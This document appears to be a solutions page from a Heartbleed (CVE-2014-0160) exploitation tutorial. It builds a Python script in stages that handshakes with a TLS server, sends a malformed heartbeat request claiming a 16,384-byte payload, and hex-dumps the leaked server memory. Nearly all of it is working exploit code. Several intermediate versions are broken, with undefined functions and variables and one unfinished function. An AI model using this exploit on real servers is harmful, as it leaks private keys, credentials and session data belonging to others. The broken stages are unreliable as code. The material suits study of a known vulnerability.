Exploiting CVE-2014-0160 Solutions¶
Build Your Command Center¶
__version__ = 0.0.0
import argparse
def build_argument_parser():
parser = argparse.ArgumentParser(description=f"""
██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
parser.add_argument(dest="port",
type=int,
help="the port which you wish to test for Heartbleed, default is 443",
default=443)
return parser.parse_args()
if __name__ == '__main__':
args = build_argument_parser()
Handling Sockets¶
__version__ = 0.0.0
import argparse
import logging
import socket
def hex2bytes(payload: str):
return bytes.fromhex(payload)
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
def build_argument_parser():
parser = argparse.ArgumentParser(description=f"""
██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
parser.add_argument(dest="port",
type=int,
help="the port which you wish to test for Heartbleed, default is 443",
default=443)
return parser.parse_args()
def main(runtime_options: argparse.Namespace):
socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logging.info('Connecting...')
socks.connect((args.host, args.port))
logging.info('Sending Client Hello...')
socks.send(hello)
if __name__ == '__main__':
args = build_argument_parser()
main(args)
Waiting for a Response & recvall()
¶
__version__ = 0.0.0
import argparse
import logging
import socket
import struct
import hexdump
def hex2bytes(payload: str):
return bytes.fromhex(payload)
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def build_argument_parser():
parser = argparse.ArgumentParser(description=f"""
██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(dest="domain", help="the domain which you wish to test for Heartbleed")
parser.add_argument(dest="port",
type=int,
help="the port which you wish to test for Heartbleed, default is 443",
default=443)
return parser.parse_args()
def main(runtime_options: argparse.Namespace):
socks = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logging.info('Connecting...')
socks.connect((args.host, args.port))
logging.info('Sending Client Hello...')
socks.send(hello)
while True:
header = socks.recv(5)
(content_type, version, length) = struct.unpack('>BHH', hdr)
handshake = recvall(s, length)
logging.info(f"Received message: type={content_type}, ver={version}, length={len(hand)}")
if content_type == 22 and ord(hand[0]) == 0x0E:
break
logging.info('Handshake done...')
logging.info('Sending heartbeat request with length 4.')
if __name__ == '__main__':
args = build_argument_parser()
main(args)
Exploiting Heartbleed¶
import argparse
import logging
import socket
import struct
import hexdump
__version__ = '0.0.1'
def h2bin(payload: str):
return bytes.fromhex(payload)
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
heartbeat = h2bin('''
18 03 02 00 03
01 40 00
''')
'''
Explanation of heartbeat (bf)call :
18 : hearbeat record
03 02 : TLS version
00 03 : length
01 : hearbeat request
40 00 : payload length 16 384 bytes check rfc6520
"The total length of a HeartbeatMessage MUST NOT exceed 2^14"
If we enter FF FF -> 65 535, we will received 4 paquets of length 16 384 bytes
'''
def identify_content_type(content_type_as_int: int):
if content_type_as_int
def hex_dump(sock: socket):
print(hexdump.dump(sock, size=4, sep='-'))
def recvall(sock: socket, count: int):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf:
return None
buf += newbuf
count -= len(newbuf)
return buf
def test_heartbleed(sock: socket):
# send heartbeat request to the server
sock.send(heartbeat)
# start listening the answer from the server
while True:
# we first get the 5 bytes of the request : content_type, version, length
# http://wiki.wireshark.org/SSL
content_version_length = sock.recv(5)
if content_version_length is None:
logging.warning('Unexpected EOF receiving record header - server closed connection')
return False
(content_type, version, length) = struct.unpack('>BHH', content_version_length)
if content_type is None:
logging.warning('No heartbeat response received, server likely not vulnerable')
return False
# we can't use s.recv(length) because the server can separate the packet heartbeat into different smaller packet
payload = recvall(sock, length)
if payload is None:
logging.warning('Unexpected EOF receiving record payload - server closed connection')
return False
# heartbeat content type is 24 check rfc6520
if content_type == 24:
print('Received heartbeat response in file out.txt')
hex_dump(payload)
if len(payload) > 3:
logging.critical('Server returned more data than it should - server is vulnerable!')
else:
logging.warning('Server processed malformed heartbeat, but did not return any extra data.')
return True
# error
if content_type == 21:
logging.info('Received alert:')
hex_dump(payload)
logging.info('Server returned error, likely not vulnerable')
return False
def build_argument_parser():
parser = argparse.ArgumentParser(description=f"""
██░ ██ ▓█████ ▄▄▄ ██▀███ ▄▄▄█████▓ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
▓██░ ██▒▓█ ▀▒████▄ ▓██ ▒ ██▒▓ ██▒ ▓▒▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
▒██▀▀██░▒███ ▒██ ▀█▄ ▓██ ░▄█ ▒▒ ▓██░ ▒░▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
░▓█ ░██ ▒▓█ ▄░██▄▄▄▄██ ▒██▀▀█▄ ░ ▓██▓ ░ ▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
░▓█▒░██▓░▒████▒▓█ ▓██▒░██▓ ▒██▒ ▒██▒ ░ ░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
▒ ░░▒░▒░░ ▒░ ░▒▒ ▓▒█░░ ▒▓ ░▒▓░ ▒ ░░ ░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
▒ ░▒░ ░ ░ ░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
░ ░░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
Version: {__version__}
""", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(dest="host", help="the host that you wish to test for Heartbleed")
parser.add_argument(dest="port",
type=int,
help="the port which you wish to test for Heartbleed, default is 443",
default=443)
return parser.parse_args()
def main(runtime_options: argparse.Namespace):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logging.info('Connecting...')
sock.connect((runtime_options.host, runtime_options.port))
logging.info('Sending Client Hello...')
sock.send(hello)
# pass the handshake
while True:
hdr = sock.recv(5)
(content_type, version, length) = struct.unpack('>BHH', hdr)
hand = recvall(sock, length)
logging.info(' ... received message: type = %d, ver = %04x, length = %d' % (content_type, version, len(hand)))
# Look for server hello done message.
if content_type == 22 and hex(hand[0]) == '0xe':
break
logging.info('Handshake done...')
logging.info('Sending heartbeat request with length 4:')
test_heartbleed(sock)
if __name__ == '__main__':
args = build_argument_parser()
main(args)